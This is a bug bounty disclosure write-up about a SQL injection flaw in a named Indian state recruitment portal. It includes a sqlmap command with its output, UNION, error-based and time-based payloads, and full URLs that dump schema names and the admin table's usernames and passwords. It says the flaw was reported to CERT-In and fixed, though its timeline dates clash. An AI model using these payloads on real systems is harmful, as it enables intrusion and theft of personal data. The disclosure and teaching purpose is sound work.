BOOK THIS SPACE FOR AD
ARTICLE ADHello, my name is Biraj Baishya, also known as brutexploiter, and I am a full-time Bug Bounty Hunter and Security Researcher.
Initial Discovery:
The discovery phase of the vulnerability is quite interesting because I visited https://staterecruit.in as a job seeker. As the Government of Assam recently announced Grade III and Grade IV jobs, I visited the site and initiated the job application process. But as a security enthusiast, every time you surf the web, you’ll be curious about how things work.
After submitting the form, I encountered the confirmation page, which seemed okay. However, my first question was: how is the data retrieved from the server? To further investigate, I opened my Developer tools in Firefox (F12) and navigated to the network tab. Since I couldn’t see any API calls, I concluded that the id parameter is responsible for data retrieval from the database.
https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id={C9A9E5EA-0000-6E67-4340-A4BA4BF20E08}The first thing that came to my mind after seeing the id parameter is SQL Injection. Since the id parameter is one of the most common targets for SQL Injection attacks, those who aren’t familiar with SQL Injection can learn more from the PortSwigger Web Academy or the OWASP Web Testing Guide.
SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. This might include data that belongs to other users, or any other data that the application can access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.
Read more: https://portswigger.net/web-security/sql-injection
Now the testing begins…
When testing for SQL Injection, the first step is to detect the SQL injection vulnerability. Therefore, the first thing I did was enter a single quote character ' and look for errors or other anomalies. Upon entering the single quote character ', the server throws a SQL error in response.
Note: Sometimes the server won’t show any error message in response. In that case, we have to test for a boolean condition or time-based SQL Injection.
The next thing is to find the number of columns and query the database type and version.
For Finding the columns:
ORDER BY 1
ORDER BY 2
ORDER BY 3 and so on
For querying the database:
' UNION SELECT @@version--To automate the process I have used sqlmap.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap: https://github.com/sqlmapproject/sqlmap
sqlmap command:
sqlmap -r req.txt --batch --force-ssl --level 5 --risk 3sqlmap result:
Parameter: id (GET)Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=test' AND EXTRACTVALUE(6427,CONCAT(0x5c,0x716a6a6271,(SELECT (ELT(6427=6427,1))),0x717a767a71)) AND 'zBLQ'='zBLQ
Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=test' AND (SELECT 4881 FROM (SELECT(SLEEP(5)))YnXf) AND 'qGsw'='qGsw
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=test' UNION ALL SELECT CONCAT(0x716a6a6271,0x525a6479634a525071674d6b774a4873775944464259496c6d58585878727246686e6252426a615a,0x717a767a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
After finding the vulnerability, I immediately created a report and sent it to vdisclose@cert-in.org.in, ditec-asm@gov.in, and incident@nic-cert.nic.in.
Steps to Reproduce:
Open a web browser and navigate to the URL: https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=1Locate the id parameter in the URL.Input single quote character 'Observe that the server returns an SQL error.
Payloads:
https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=test%27%20UNION%20ALL%20SELECT%201,2,3,group_concat(schema_name),5,6,7,8,9,10%20FROM%20information_schema.schemata--%20-https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=test%27%20UNION%20ALL%20SELECT%201,2,3,group_concat(id,username,password,user_role),5,6,7,8,9,10%20FROM%20idol_slrc_class_iii_2023.admin_user--%20-https://staterecruit.in/GrAde_iii_2023/WebPages/RegReport.php?id=test%27%20UNION%20ALL%20SELECT%201,2,3,@@hostname,5,6,7,8,9,10--%20-Business Impact:
Successful exploitation of this vulnerability could result in unauthorized access to sensitive data, modification of database contents, or other actions depending on the permissions associated with the database user.
Personally Identifiable Information (PII) :
Aadhar NumberAddress
Caste
City
Educational Qualifications
Email Address
Full Name
Gender
Mobile Number
Religion
Password
Timeline:
Dec 14, 2023: Vulnerability Reported to CERT-In
Dec 15, 2023: Initial Response Received from DITEC, Assam, and CERT-In
Jan 8, 2023: Vulnerability Fixed
April 13, 2023: Publicly Disclosed
Thank you for reading. I hope you enjoyed reading the write-up!
References:
Twitter : https://twitter.com/brutexploiter
Linkedin : https://www.linkedin.com/in/brutexploiter